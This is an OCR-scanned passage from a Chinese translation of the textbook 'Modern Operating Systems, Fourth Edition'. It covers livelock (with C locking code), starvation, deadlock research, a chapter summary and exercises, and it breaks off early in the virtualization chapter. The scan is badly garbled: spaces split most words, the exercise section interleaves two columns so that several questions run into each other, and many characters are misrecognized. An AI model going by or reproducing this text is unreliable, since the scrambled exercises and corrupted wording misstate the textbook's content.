acquire_lock(&resource_ 1); 


use_both_resources( ); 
release_lock(&resource_ 2); 
release_lock(&resource_ 1); 


} 


void process_A(void) { 

acquire_lock(&resource_2); 

while (try_lock(&resource_1) == FAIL) { 
release_lock(&resource_ 2); 
wait_fixed_time(); 
acquire_lock(&resource_2); 

} 

use_both_resources( ); 

release_lock(&resource_1); 

release _lock(&resource_2); 


} 





图 6-16 礼貌 的 进程 可 能 导致 活 锁 


略 了 一 个 问题 ， 即 比 起 限制 所 有 用 户 去 使 用 一 个 进程 、 一 个 打开 的 文件 或 任意 一 种 资源 来 说 ， 大 多 数 用 
户 可 能 更 愿意 选择 一 次 偶然 的 活 锁 (或 者 甚至 是 死 锁 )。 如 果 这 些 问题 能 够 免费 消除 ， 那 就 不 会 有 和 争论。 
但 问题 是 代价 非常 高 ， 因 而 几乎 都 是 给 进程 加 上 不 便 的 限制 来 处 理 。 因 此 我 们 面 对 的 问题 是 从 便捷 性 和 
正确 性 中 做 出 取舍 ， 以 及 一 系列 关于 哪个 更 重要 、 对 谁 更 重要 的 争论 。 


6.7.4 饥饿 

与 死 锁 和 活 锁 非常 相似 的 一 个 问题 是 饥饿 (starvation)。 在 动态 运行 的 系统 中 ， 在 任何 时 刻 都 可 能 
请 求 资源 。 这 就 需要 一 些 策略 来 决定 在 什么 时 候 谁 获得 什么 资源 。 虽 然 这 个 策略 表面 上 很 有 道理 ， 但 依 
然 有 可 能 使 一 些 进程 永远 得 不 到 服务 ， 虽 然 它 们 并 不 是 死 锁 进程 。 

作为 一 个 例子 ， 考 虑 打印 机 分 配 。 设 想 系统 采用 某 种 算法 来 保证 打印 机 分 配 不 产生 死 锁 。 现 在 假设 
若干 进程 同时 都 请 求 打印 机 ， 究 竟 哪 一 个 进程 能 获得 打印 机 呢 ? 

一 个 可 能 的 分 配方 案 是 把 打印 机 分 配给 打印 最 小 文件 的 进程 (假设 这 个 信息 可 知 )。 这 个 方法 让 尽 
量 多 的 顾客 满意 ， 并 且 看 起 来 很 公平 。 我 们 考虑 下 面 的 情况 : 在 一 个 繁忙 的 系统 中 ， 有 一 个 进程 有 一 个 
很 大 的 文件 要 打印 ， 每 当 打 印 机 空 闪 ， 系 统 纵 观 所 有 进程 ， 并 把 打印 机 分 配给 打印 最 小 文件 的 进程 。 如 
果 存 在 一 个 固定 的 进程 流 ， 其 中 的 进程 都 是 只 打印 小 文件 ， 那 么 ， 要 打印 大 文件 的 进程 永远 也 得 不 到 打 
印 机 。 很 简单 ， 它 会 “饥饿 而 死 ”( 无 限制 地 推 后 ， 尽 管 它 没有 被 阻塞 ) 。 

饥饿 可 以 通过 先 来 先 服 务 资源 分 配 策略 来 避免 。 在 这 种 机 制 下 ， 等 待 最 久 的 进程 会 是 下 一 个 被 调度 
的 进程 。 随 着 时 间 的 推移 ， 所 有 进程 都 会 变 成 最 “ 老 ” 的 ， 因 而 ， 最 终 能 够 获得 资源 而 完成 。 


6.8 有 关 死 锁 的 研究 

死 锁 这 一 问题 在 操作 系统 发 展 的 早期 就 得 到 了 详细 的 研究 。 原 因 在 于 死 锁 的 检测 是 一 个 经 典 的 图 论 
问题 ， 任 何 对 数学 有 兴趣 的 研究 生 都 可 以 做 上 3~4 年 的 研究 。 所 有 相关 算法 都 已 经 经 过 反复 修正 ， 但 每 
次 修正 总 是 得 到 更 古怪 、 更 不 现实 的 算法 。 很 多 研究 工作 都 已 经 销声匿迹 ， 但 是 仍然 有 很 多 关于 死 锁 的 
论文 发 表 。 

近期 关于 死 锁 的 研究 方向 之 一 是 死 锁 避 免 (Jula 等 人 ，2011) 。 这 种 方法 的 主要 思想 是 ， 应 用 程序 
在 死 锁 发 生 的 时 候 检测 出 死 锁 并 且 保 存 它 们 的 特征 ， 从 而 避免 在 之 后 的 运行 中 发 生 相同 的 死 锁 。 除 此 之 
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Dh, Marino A (2013) 使 用 并 发 控制 来 确保 死 锁 不 会 首次 出 现 。 

另外 一 个 研究 方向 是 死 锁 检测 。 近 期 关于 死 锁 检 测 的 工作 是 由 Pyla 和 Varadarajan (2012) 提出 的 。 
Cai 和 Chan (2012) 的 研究 工作 提出 了 一 种 动态 的 死 锁 检测 机 制 ， 能 够 迭代 地 减少 没有 入 边 和 出 边 的 锁 
的 依赖 关系 。 

关于 死 锁 的 问题 也 逐渐 渗透 到 各 个 领域 。Wu 等 人 (2013) 描述 了 一 种 用 于 自动 加 工 系统 的 死 锁 控 
制 系统 ， 其 中 使 用 Petri 网 来 模拟 系统 ， 从 而 寻找 允许 自由 死 锁 控 制 的 充分 和 必要 条 件 。 

还 有 很 多 研究 是 关于 分 布 式 死 锁 检测 的 ， 尤 其 是 在 高 性 能 计算 领域 。 例 如 ， 有 很 多 工作 是 基于 死 锁 
检测 的 调度 。Wang 和 Lu (2013) 提出 了 一 个 在 存储 受 限 工作 流 计 算 中 的 调度 算法 。Hilbrich 等 人 (2013) 
描述 了 用 于 MPI 的 运行 时 死 锁 检测 。 最 后 ， 还 有 很 多 关于 分 布 式 死 锁 检测 的 理论 工作 。 这 里 就 不 做 表述 
了 ， 主 要 是 因为 : (1) 它们 超出 了 本 书 的 范围 ， (2) 这 些 研 究 在 实际 系统 中 的 应 用 非常 少 ， 似 乎 只 是 
为 了 让 一 些 图 论 家 有 事 可 做 罢了 。 


6.9 小 结 


死 锁 是 任何 操作 系统 中 都 存在 的 潜在 问题 。 当 一 组 进程 中 的 每 个 进程 都 因 等 待 由 该 组 进程 中 的 另 一 
进程 所 占有 的 资源 而 导致 阻塞 ， 死 锁 就 发 生 了 。 这 种 情况 会 使 所 有 的 进程 都 处 于 无 限 等 待 的 状态 。 一 般 
来 讲 ， 这 是 进程 一 直 等 待 被 其 他 进程 占用 的 某 些 资 源 释放 的 事件 。 死 锁 的 另外 一 种 可 能 情况 是 一 组 通信 
进程 都 在 等 待 一 个 消息 ， 而 通信 信道 却 是 空 的 ， 并 且 也 没有 采用 超时 机 制 。 

通过 跟踪 哪 一 个 状态 是 安全 状态 ， 哪 一 个 状态 是 不 安全 状态 ， 可 以 避免 资源 死 锁 。 安 全 状态 就 是 这 
样 一 个 状态 : 存在 一 个 事件 序列 ， 保 证 所 有 的 进程 都 能 完成 。 不 安全 状态 就 没有 这 样 的 保证 。 银 行家 算 
法 可 以 通过 拒绝 可 能 引起 不 安全 状态 的 请 求 来 避免 死 锁 。 

也 可 以 在 设计 系统 时 从 系统 结构 上 预防 资源 死 锁 的 发 生 ， 这 样 可 以 永久 性 地 解决 资源 死 锁 问题 。 例 
如 ， 只 允许 进程 在 任何 时 刻 最 多 占有 一 个 资源 ， 这 就 破坏 了 循环 等 待 环 路 。 也 可 以 将 所 有 的 资源 编号 ， 
规定 进程 按 严格 的 升序 请 求 资源 ， 这 样 也 能 预防 死 锁 。 

资源 死 锁 并 不 是 唯一 的 一 种 死 锁 。 尽 管 我 们 可 以 通过 设置 适当 的 超时 机 制 来 解决 通信 死 锁 ， 但 它 依 
然 是 某 些 系统 中 潜在 的 问题 。 

活 锁 和 死 锁 的 问题 有 些 相 似 ， 那 就 是 它 也 可 以 停止 所 有 的 转发 进程 ， 但 是 二 者 在 技术 上 不 同 ， 由 于 
活 锁 包 含 了 一 些 实际 上 并 没有 锁 住 的 进程 ， 因 此 可 以 通过 先 来 先 服务 的 分 配 策略 来 避免 饥饿 。 


习题 


1. 给 出 一 个 由 策略 产生 的 死 锁 的 例子 。 汽车 阻塞 了 它们 后 面 的 汽车 ， 进 而 又 阻塞 了 试 
.学 生 们 在 机 房 的 个 人 计算 机 上 将 自己 要 打印 的 图 进入 前 面 路 口 的 车 辆 。 城 市 街区 的 所 有 路 口 
文件 发 送 给 服务 器 ， 服 务 器 会 将 这 些 文件 暂 存 都 以 一 种 循环 的 方式 遍布 被 阻塞 的 汽车 。 僵 局 ” 
在 它 的 硬盘 上 。 如 果 服务 器 磁盘 空间 有 限 ， 那 是 一 个 资源 死 锁 和 同步 竞争 的 问题 。 纽 约 市 的 
么 ， 在 什么 情况 下 会 产生 死 锁 ? 这 样 的 死 锁 应 预防 算法 称 为 “ 非 阻 塞 盒子 ” ， 除 非 一 个 交叉 路 
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该 怎样 避免 ? 口 的 后 续 空间 是 非 阻塞 的 ， 否 则 禁止 汽车 进入 
3. 在 前 一 题 中 ， 哪 些 资源 是 可 抢占 的 ， 哪 些 资 源 这 个 交叉 路 口 。 这 是 哪 种 预防 算法 ? 你 能 否 提 
是 不 可 抢占 的 ? 供 其 他 的 预防 算法 来 解决 “僵局 ”问题 ? 
4. 在 图 6-1 中 , 资源 释放 的 顺序 与 获得 的 顺序 相反 ， 7. 假设 四 辆 汽车 同时 从 四 个 不 同 的 方向 驶 向 同一 


以 其 他 的 顺序 释放 资源 能 否 得 到 同样 的 结果 ? 个 交叉 路 口 ， 路 口 的 每 一 个 拐角 处 都 有 一 个 停 
.一 个 资源 死 锁 的 发 生 有 四 个 必要 条 件 〈 互 斥 使 车 标志 。 假 设 交 通 规 则 要 求 当 两 辆 汽车 同时 接 
用 资源 、 占 有 和 等 待 资源 、 不 可 抢占 资源 和 环 近 相 邻 的 停车 标志 时 ， 左 边 的 车 必须 让 右边 的 
路 等 待 资源 ) 。 举 一 个 例子 说 明 它们 对 于 一 个 资 车 先行 。 那 么 当 四 辆 车 同时 接近 停车 标志 时 ， 
源 死 锁 的 发 生 不 是 充分 条 件 。 何 时 这 些 条 件 对 每 辆 车 都 会 让 右边 的 车 先行 。 这 是 否 是 一 个 异 
一 个 资源 死 锁 的 发 生 是 充分 条 件 ? 常 的 通信 死 锁 ? 这 是 否 是 一 个 资源 死 锁 ? 

6. 城 市 街道 很 容易 遇 到 循环 阻塞 的 情况 ， 我 们 称 8. 有 没有 可 能 一 个 资源 死 锁 涉及 一 个 类 型 的 多 个 
之 为 “僵局 "”。 其 中 交叉 路 口 被 汽车 堵塞 ， 这 些 单位 和 另 一 个 类 型 的 一 个 单位 ? 如 果 有 可 能 ， 
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请 给 出 一 个 例子 。 
图 6-3 给 出 了 资源 分 配 图 的 概念 ， 试 问 是 否 存 在 
不 合理 的 资源 分 配 图 ， 即 资源 分 配 图 在 结构 上 
违反 了 使 用 资源 的 模型 ? 如 果 存 在 ， 请 给 出 一 
个 例子 。 

.考虑 图 6-4。 假 设 在 图 6-4o 中 ，C 请 求 S 而 不 是 
请 求 R， 这 是 否 会 导致 死 锁 ?假设 它 同 时 请 求 
S 和 R， 情 况 又 如 何 ? 

.假设 一 个 系统 中 存在 一 个 资源 死 锁 。 举 一 个 例 
子 说 明 死 锁 的 进程 集合 能 够 包括 不 在 相应 的 资 
源 分 配 图 的 循环 链 中 的 进程 。 

.为 了 控制 流量 ， 网 络 路 由 器 A 周期 性 地 向 邻居 
B 发 送 消 息 ， 告 诉 它 增 加 或 者 减少 能 够 处 理 的 
包 的 数目 。 在 某 个 时 间 点 ， 路 由 器 A 充斥 着 流 
量 ， 因 此 A 向 B 发 送 消息 ， 通 过 指定 B 能 够 发 送 
的 数据 量 (A 的 窗口 大 小 ) 为 0 来 告诉 它 停 止 
发 送 流 量 。 流 量 高 峰 期 过 去 之 后 ，A 向 B 发 送 
一 个 新 消息 ， 通 过 将 A 的 窗口 大 小 从 0 增加 到 
一 个 正 数 来 告诉 它 重新 启动 数据 传输 。 但 是 这 
条 消息 丢失 了 。 如 前 所 述 ， 两 方 都 不 会 传输 数 
据 。 这 是 哪 种 类 型 的 死 锁 ? 

. 怠 乌 算法 中 提 到 了 填充 进程 表 表 项 或 者 其 他 系 
统 表 的 可 能 。 能 否 给 出 一 种 能 够 使 系统 管理 员 
从 这 种 状况 下 恢复 系统 的 方法 ? 

.考虑 系统 的 如 下 状态 ， 有 四 个 进程 P1、P2.、 
P3 和 P4， 以 及 五 种 类 型 的 资源 RS1、RS2、 
RS3、RS4 和 RS5。 


使 用 6.4.2 节 中 描述 的 死 锁 检测 算法 来 说 明 该 系 
统 中 存在 一 个 死 锁 。 并 识别 在 死 锁 中 的 进程 。 
. 解释 系统 是 如 何 从 前 面 问题 的 死 锁 中 恢复 的 ， 
使 用 : (a) 抢占 ; (b) ER, (0) 终止 进程 。 
.假设 在 图 6-6 中 ， 对 菜 个 :， 有 Cy + Ry> Ep 这 
意味 着 什么 ? 

.图 6-8 中 的 所 有 轨道 都 是 水 平 的 或 者 垂直 的 。 
你 能 否 设 想 一 种 情况 ， 使 得 同样 存在 斜 轨迹 的 
可 能 ? 


.图 6-8 所 示 的 资源 轨迹 模式 是 否 可 用 来 说 明 三 


个 进程 和 三 个 资源 的 死 锁 问题 ?如 果 可 以 ， 它 
“是 怎样 说 明 的 ? 如果 不 可 以 ， 请 解释 为 什么 。 
. 理论 上 ， 资 源 轨迹 图 可 以 用 于 避免 死 锁 。 通 过 合 
理 的 调度 ， 操 作 系统 可 避免 进入 不 安全 区 域 。 请 
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列举 一 个 在 实际 运用 这 种 方法 时 会 带 来 的 问题 。 
一 个 系统 是 否 可 能 处 于 既 非 死 锁 也 不 安全 的 状 
态 ? 如 果 可 以 ， 举 出 例子 ， 如 果 不 可 以 ， 请 证 
明 所 有 状态 只 能 处 于 死 锁 或 安全 两 种 状态 之 一 。 


.仔细 考察 图 6-11b， 如 果 D 再 多 请 求 1 个 单位 ， 


会 导致 安全 状态 还 是 不 安全 状态 ? 如 果 换 成 C 
提出 同样 请 求 ， 情 形 会 怎样 ? 

某 一 系统 有 两 个 进程 和 三 个 相同 的 资源 。 每 个 
进程 最 多 需要 两 个 资源 。 这 种 情况 下 有 没有 可 
能 发 生死 锁 ? 为 什么 ? 

重新 考虑 上 一 题 ， 假 设 现在 共有 P 个 进程 ， 每 
个 进程 最 多 需要 mm 个 资源 ,并 且 有 7 个 资源 可 用 。 
什么 样 的 条 件 可 以 保证 死 锁 不 会 发 生 ? 


.假设 图 6-12 中 的 进程 A 请 求 最 后 一 台 磁 带 机 ， 


这 一 操作 会 引起 死 锁 吗 ? 

银行 家 算法 在 一 个 有 m 个 资源 类 型 和 n 个 进程 
的 系统 中 运行 。 当 m 和 n 都 很 大 时 ， 为 检查 状 
态 是 否 安全 而 进行 的 操作 次 数 正比 于 m* n, a 
和 4b 的 值 是 多 少 ? 

一 个 系统 有 4 个 进程 和 5 个 可 分 配 资源 ， 当 前 分 
配 和 最 大 需求 如 下 : 
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若 保持 该 状态 是 安全 状态 ，x 的 最 小 值 是 多 少 ? 


-一 个 消除 环 路 等 待 的 方法 是 用 规则 约定 一 个 进 


程 在 任意 时 刻 只 能 得 到 一 个 资源 。 举 例 说 明 在 
很 多 情况 下 这 个 限制 是 不 可 接受 的 。 


.两 个 进程 A 和 和 B ， 每 个 进程 都 需要 数据 库 中 的 3 


个 记录 1、2、3。 如 果 A 和 B 都 以 /、2、3 的 次 
序 请求 ， 将 不 会 发 生死 锁 。 但 是 如 果 B 以 3、2、 
1 的 次 序 请 求 ， 那 么 死 锁 就 有 可 能 会 发 生 。 对 
于 这 3 种 资源 ， 每 个 进程 共有 31 ( 即 6) 种 次 序 
请 求 ， 这 些 组 合 中 有 多 大 的 可 能 可 以 保证 不 会 
发 生死 锁 ? 

一 个 使 用 信箱 的 分 布 式 系 统 有 两 条 IPC 原 语 : 
send 和 receive。receive 原 语 用 于 指定 从 哪个 
进程 接收 消息 ， 并 且 如 果 指 定 的 进程 没有 可 用 
消息 ， 即 使 其 他 进程 正在 写 消息 ， 该 进程 也 等 
待 。 进程 不 存在 共享 资源 , 但 是 由 于 其 他 原因 ， 
进程 需要 经 常 通信 。 死 锁 有 可 能 产生 吗 ? 请 讨 
论 这 一 问题 。 

在 一 个 电子 资金 转账 系统 中 ， 有 很 多 相同 进程 
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按 如 下 方式 工作 : 每 个 进程 读 取 一 行 输入 ， 该 
输入 给 出 一 定数 目的 款项 、 贷 方 账户 、 借 方 账 
户 。 然 后 该 进程 锁定 两 个 账户 ， 传 送 这 笔 钱 ， 
完成 后 释放 锁 。 由 于 很 多 进程 并 行 运行 ， 所 以 
存在 这 样 的 危险 : 锁定 x 会 无 法 锁定 y， 因 为 y 
已 被 一 个 正在 等 待 x 的 进程 锁定 。 设 计 一 个 方 
案 来 避免 死 锁 。 保 证 在 没有 完成 事务 处 理 前 不 
要 释放 该 账户 记录 。( 换 句 话说， 在 锁定 一 个 
账户 时 ， 如 果 发 现 另 一 个 账户 不 能 被 锁定 就 立 
即 释放 这 个 已 锁定 的 账户 。) 

31. 一 种 预防 死 锁 的 方法 是 去 除 占有 和 等 待 条 件 。 
在 本 书 中 ， 假 设 在 请 求 一 个 新 的 资源 以 前 ， 进 
程 必须 释放 所 有 它 已 经 占有 的 资源 (假设 这 是 
可 能 的 )。 然 而 ， 这 种 做 法 会 引入 这 样 的 危险 
性 : 竞争 的 进程 得 到 了 新 的 资源 但 却 丢 失 了 原 
有 的 资源 。 请 给 出 这 一 方法 的 改进 。 

32 计算 机 系 学 生 想 到 了 下 面 这 个 消除 死 锁 的 方 
法 。 当 某 一 进程 请 求 一 个 资源 时 ， 规 定 一 个 时 
间 限 制 。 如 果 进 程 由 于 得 不 到 需要 的 资源 而 被 
阻塞 ， 定 时 器 就 会 开始 运行 。 当 超过 时 间 限 制 
后 ， 进 程 会 被 释放 掉 ， 并 且 人 允许 该 进程 重新 运 
行 。 如 果 你 是 教授 ， 你 会 给 这 样 的 学 生 多 少 
分 ? 为 什么 ? 

33. 内 存单 元 被 交换 区 和 虚拟 内 存 系统 抢占 。 处 理 
器 在 分 时 环境 中 被 抢占 。 你 认为 这 些 抢占 方法 
是 为 了 处 理 资 源 死 锁 还 是 有 其 他 的 目的 ? 它们 
的 开销 有 多 大 ? 

34. 解释 死 锁 、 活 锁 和 饥饿 的 区 别 。 

35. 假设 两 个 进程 发 出 查找 命令 来 改变 访问 磁盘 的 
机 制 并 启用 读 命令 。 每 个 进程 在 执行 读 命令 之 
前 被 中 断 ， 并 且 发 现 另 外 一 个 进程 已 经 移动 了 
磁盘 。 它 们 都 重新 发 出 查找 命令 ， 但 是 又 同时 
被 对 方 中 断 。 这 个 序列 不 断 地 重复 。 这 是 一 个 
资源 死 锁 还 是 活 锁 ? 你 推荐 用 什么 方法 来 解决 
这 个 异常 ? 

36. 局 域 网 使 用 一 种 叫 作 CSMA/CD 的 媒体 访问 方 
法 。 在 这 个 方法 中 ， 站 点 之 间 共 享 一 条 总 线 ， 
并 且 能 够 感知 传输 媒介 以 及 检测 传输 和 冲突 。 
在 以 太 网 协议 中 ， 站 点 请 求 共享 通道 时 如 果 感 
知 到 传输 通道 是 忙碌 的 , 那么 它们 不 会 传输 帧 。 
当 传 输 结束 的 时 候 , 等 待 的 站 点 会 继续 传输 帧 。 
同时 传输 两 个 帧 会 产生 冲突 。 如 果 站 点 在 检测 
到 冲突 之 后 立即 重复 传输 这 些 帧 ， 则 又 会 连续 
地 产生 冲突 。 

(a) 这 是 一 个 资源 死 锁 还 是 活 锁 ? 
(b) 你 能 否 为 这 种 异常 提出 一 个 解决 方法 ? 
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(c) 这 种 情况 下 会 产生 饥饿 么 ? 


.一 个 程序 在 合作 和 竞争 机 制 的 顺序 上 存在 着 错 


误 ， 导 致 消费 者 进程 在 阻塞 空 缓冲 区 之 前 就 锁 
定 了 互 斥 量 ( 互 斥 信号 量 ) 。 生 产 者 进程 在 能 
够 将 数据 放 在 空 缓冲 区 上 以 及 唤醒 消费 者 进程 
之 前 被 阻塞 在 互 斥 量 上 。 因 此 ， 生 产 者 进程 和 
消费 者 进程 都 被 一 直 阻 塞 ， 生 产 者 进程 等 待 互 
斥 量 被 解锁 ， 消 费 者 进程 等 待 生产 者 进程 发 出 
的 信号 。 这 是 一 个 资源 死 锁 还 是 通信 死 锁 ? 请 
提出 一 种 方法 来 解决 进程 之 间 的 控制 问题 。 


.Cinderella 和 Prince 要 离婚 ， 为 分 割 财产 ， 他 


们 商定 了 以 下 算法 。 每 天 早晨 每 个 人 发 函 给 
对 方 律师 要 求 财产 中 的 一 项 。 由 于 邮递 信件 
需要 一 天 的 时 间 ， 他 们 商定 如 果 发 现在 同一 
天 两 人 请 求 了 同一 项 财产 ， 第 二 天 他 们 会 发 
信 取 消 这 一 要 求 。 他 们 的 财产 包括 狗 Woofer、 
Woofer 的 狗 屋 、 金 丝 省 Tweeter 和 Tweeter 的 
鸟 乱 。 由 于 这 些 动 物 喜 爱 它们 的 房屋 ， 所 以 
又 商定 任何 将 动物 和 它们 房屋 分 开 的 方案 都 
无 效 ， 且 整个 分 配 从 头 开 始 。Cinderella 和 
Prince 都 非常 想 要 Woofer。 于 是 他 们 分 别 去 度 
假 ， 并 且 每 人 都 编写 程序 用 一 台 个 人 计算 机 
处 理 这 一 谈判 工作 。 当 他 们 度假 回来 时 ， 发 
现 计 算 机 仍 在 谈判 ， 为 什么 ? 产生 死 锁 了 
吗 ? PRE DLR TS? 请 讨论 。 

一 个 主 修 人 类 学 、 辅 修 计算 机 科学 的 学 生 参 加 
了 一 个 研究 课题 ， 调 查 是 否 可 以 教会 非洲 独 独 
理解 死 锁 。 他 找到 一 处 很 深 的 峡谷 ， 在 上 边 固 
定 了 一 根 横 跨 峡谷 的 绳索 ， 这 样 独 独 就 可 以 攀 
住 绳索 越过 峡谷 。 同 一 时 刻 ， 只 要 朝 着 相同 的 
方向 就 可 以 有 多 只 独 狮 通过。 但 如 果 向 东 和 向 
西 的 儿 独 同时 攀 在 绳索 上 ， 那 么 就 会 产生 死 锁 
( 独 儿 会 被 卡 在 中 间 ) ， 因 为 它们 无 法 在 绳索 上 
从 另 一 只 的 背 上 翻 过 去 。 如 果 一 只 独 独 想 越过 
峡谷 ， 它 必须 看 当前 是 否 有 别 的 独 独 正在 逆向 
通行 。 利 用 信号 量 编写 一 个 避免 死 锁 的 程序 来 
解决 该 问题 。 不 考虑 连续 东 行 的 独 独 会 使 得 西 
行 的 独 儿 无 限制 地 等 待 的 情况 。 


.重复 上 一 个 习题 ， 但 此 次 要 避免 饥饿。 当 一 只 


想 向 东 去 的 儿 独 来 到 绳索 跟前 ， 但 它 发 现 有 别 
的 独 独 正在 向 西 越过 峡谷 时 ， 它 会 一 直 等 到 绳 
索 可 用 为 止 。 但 在 至 少 有 一 只 独 独 向 东 越过 峡 
谷 之 前 ， 不 允许 再 有 猩 独 开始 从 东 向 西 越过 峡 
谷 。 


. 编写 银行 家 算法 的 模拟 程序 。 该 程序 应 该 能 够 


循环 检查 每 一 个 提出 请 求 的 银行 客户 ， 并 且 能 
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判断 这 一 请 求 是 否 安全 。 请 把 有 关 请 求 和 相应 
决定 的 列表 输出 到 一 个 文件 中 。 

42. 写 一 个 程序 实现 每 种 类 型 多 个 资源 的 死 锁 检测 
算法 。 你 的 程序 应 该 从 一 个 文件 中 读 取 下 面 的 
输入 : 进程 数 、 资 源 类 型 数 、 每 种 存在 类 型 的 
资源 数 (向 量 E) 、 当 前 分 配 和 矩阵 C (第 一 行 ， 
接着 第 二 行 , 以 此 类 推 )、 需 求 矩 阵 R (第 一 行 ， 
接着 第 二 行 ， 以 此 类 推 )。 你 的 程序 输出 应 表 
明 在 此 系统 中 是 否 有 死 锁 。 如 果 系 统 中 有 死 锁 ， 
程序 应 该 打印 出 所 有 死 锁 的 进程 ID。 

43. 写 一 个 程序 使 用 资源 分 配 图 检测 系统 中 是 否 存 
在 死 锁 。 你 的 程序 应 该 从 一 个 文件 中 读 取 下 面 


EAE A 


的 输入 : 进程 数 和 资源 数 。 对 每 个 进程 ， 你 应 
该 读 取 4 个 数 : 进程 当前 持 有 的 资源 数 、 它 持 
有 的 资源 的 ID、 它 当前 请 求 的 资源 数 、 它 请 求 
的 资源 ID。 程 序 的 输出 应 表明 在 此 系统 中 是 否 
有 死 锁 。 如 果 系 统 中 有 死 锁 ， 程 序 应 该 打印 出 - 
所 有 死 锁 的 进程 ID。 


.在 某 些 国家 ， 当 两 人 相遇 的 时 候 会 互相 鞠躬 。 


这 项 礼仪 通常 是 两 人 中 的 一 人 首先 鞠躬 ， 并 保 
持 姿 势 以 等 待 另 一 人 园 躬 。 如 果 两 人 同时 鞠躬 ， 
那么 他 们 都 会 永远 保持 鞠躬 的 状态 。 请 写 一 个 
程序 ， 保 证 不 会 产生 死 锁 。 





第 7 章 


Modern Operating Systems, Fourth Edition 


虚拟 化 和 云 





有 了 时， 一 家 机 构 虽 然 拥 有 一 个 多 计算 机 系统 ， 但 并 不 是 真正 想 要 它 。 一 个 很 常见 的 例子 是 ,一 家 公 
司 拥有 邮件 服务 器 、Web 服 务 器 、FTP 服 务 器 、 电 子 商务 服务 器 及 其 他 服务 器 。 这 些 服 务 器 都 运行 在 同 
一 机 架 的 不 同 计算 机 上 ， 通 过 高 速 网 络 连接 ， 组 成 多 计算 机 系统 。 这 些 服 务 器 运行 在 不 同 机 器 上 的 原因 
之 一 可 能 是 一 台 计 算 机 无 法 处 理 所 有 负载 。 另 一 个 原因 是 可 靠 性 ， 管 理 层 根本 不 相信 一 个 操作 系统 能 一 
年 365 天 、 一 天 24 小 时 连续 无 故障 运行 。 把 各 个 服务 放 到 独立 的 计算 机 上 之 后 ， 如 果 一 个 服务 器 崩溃 了 ， 
至 少 其 他 的 能 不 受 影响 。 这 样 做 的 另 一 个 好 处 是 安全 性 。 亚 意 入 侵 者 即使 攻陷 了 Web 服 务 器 ， 也 不 能 立 
即 看 到 敏感 的 电子 邮件 。 这 个 性 质 有 时 被 称 作 沙 盒 (sandboxing) 。 虽 然 多 计算 机 系统 实现 了 隔离 和 容错 ， 
但 是 这 种 解决 方案 昂贵 且 难 以 管理 ， 因 为 涉及 的 机 器 太 多 。 

值得 一 提 的 是 ， 除 了 可 靠 性 和 安全 性 之 外 ,保留 多 台独 立 的 机 器 还 有 很 多 其 他 原因 。 例 如 ， 机 构 的 
日 常 运作 通常 依赖 多 个 操作 系统 :Web 服务器 运行 在 Linux 上 ， 邮 件 服务 器 运行 在 Windows 上， 电子 商务 
服务 器 运行 在 OS X 上 ， 其 他 服务 运行 在 不 同 种 类 的 UNIX 上 。 多 计算 机 系统 同样 是 个 有 效 的 解决 方案 ， 
但 不 够 廉价 。 

除了 多 计算 机 系统 以 外 ， 还 有 什么 办 法 呢 ? 一 个 可 能 (而 且 流 行 ) 的 解决 方案 是 使 用 虚拟 化 技术 。 
虚拟 化 听 起 来 时 明 ， 但 思想 并 不 新 颖 ， 可 以 追溯 到 20 世 纪 60 年 代 。 不 过 ， 现 在 使 用 虚拟 化 技术 的 方式 是 
靳 新 的 。 虚 拟 化 的 主要 思想 是 虚拟 机 监控 程序 (Virtual Machine Monitor, VMM) 在 同一 物理 硬件 上 创 
建 出 有 多 台 虚 拟 机 器 的 假象 。VMM 又 称 作 虚拟 机 管理 程序 (hypervisor) 。 如 1.7.5 节 所 讨论 的 那样 ， 我 
们 区 分 第 一 类 虚拟 机 管理 程序 和 第 二 类 虚拟 机 管理 程序 。 前 者 运行 在 裸 机 上 ， 而 后 者 依赖 于 底层 操作 系 
统 提 供 的 服务 和 抽象 。 无 论 是 哪 一 类 ， 虚 拟 化 技术 都 允许 单一 计算 机 上 运行 多 个 虚拟 机 ， 各 虚拟 机 能 运 
行 不 同 的 操作 系统 。 

这 种 方法 的 好 处 是 一 台 虚 拟 机 的 故障 不 会 影响 其 他 虚拟 机 。 在 一 个 虚拟 化 系统 中 ， 不 同 的 服务 器 可 
以 运行 在 不 同 的 虚拟 机 上 ， 傣 而 以 更 低 的 开销 和 更 好 的 可 维护 性 保留 多 计算 机 系统 具有 的 局 部 故障 模型 。 
而 且 ， 可 以 在 同一 硬件 上 运行 多 个 不 同 的 操作 系统 ， 并 享受 虚拟 机 隔离 带 来 的 安全 性 和 其 他 好 处 。 

当然 ， 这 样 整 合 不 同 服务 器 就 相当 于 把 鸡蛋 放 到 同一 个 篮子 里 。 如 果 运 行 虚拟 机 的 机 器 本 身 出 现 故 
障 ， 后 果 将 比 单个 专用 服务 器 的 崩溃 更 具有 灾难 性 。 不 过 ， 虚 拟 化 技术 有 效 的 前 提 是 绝 大 多 数 服务 中 断 
不 是 硬件 缺陷 造成 的 ， 而 是 由 于 软件 设计 不 周 、 不 可 靠 、 有 人 缺陷、 配置 不 当 造 成 的 ， 特 别 是 操作 系统 。 
使 用 虚拟 化 技术 时 ， 只 有 虚拟 机 管理 程序 在 最 高 特权 级 下 运行 ， 而 虚拟 机 管理 程序 的 代码 行 数 比 一 个 完 
整 的 操作 系统 少 两 个 数量 级 ， 因 而 缺陷 数量 也 少 两 个 数量 级 。 虚 拟 机 管理 程序 比 操作 系统 简单 ， 因 为 它 
只 做 模拟 裸 机 (通常 是 Intel x86 体 系 结构 ) 的 多 个 拷贝 这 一 件 事 。 

除了 强 隔离 性 之 外 ， 在 虚拟 机 上 运行 软件 还 有 其 他 好 处 。 其 中 之 一 是 物理 机 数量 的 减少 节省 了 硬件 
和 电力 开销 以 及 机 架空 间 的 占用 。 对 于 Amazon 或 Microsoft 这 样 的 公司 来 说 ， 每 个 数据 中 心 可 能 有 数 十 
万 台 机 器 在 处 理 海量 的 不 同 任务 ， 数 据 中 心 实物 需求 的 减少 意味 着 成 本 的 大 幅 降低 。 事 实 上 ， 服 务 器 公 
司 常常 将 数据 中 心 建造 在 荒 无 人 烟 的 地 方 ， 只 要 离 便宜 的 能 源 (如 水 电站 ) 足够 近 就 行 。 虚 拟 化 技术 还 
能 在 尝试 新 想法 时 提供 帮助 。 在 大 公司 里 ， 各 部 门 提出 新 的 想法 之 后 通常 会 买 一 台 服 务 器 进行 实施 。 如 
果 想 法 被 采纳 ， 就 需要 增加 成 百 上 千 台 服务 器 ,扩张 企业 数据 中 心 。 将 软件 移 到 现 有 机 器 上 运行 通常 很 
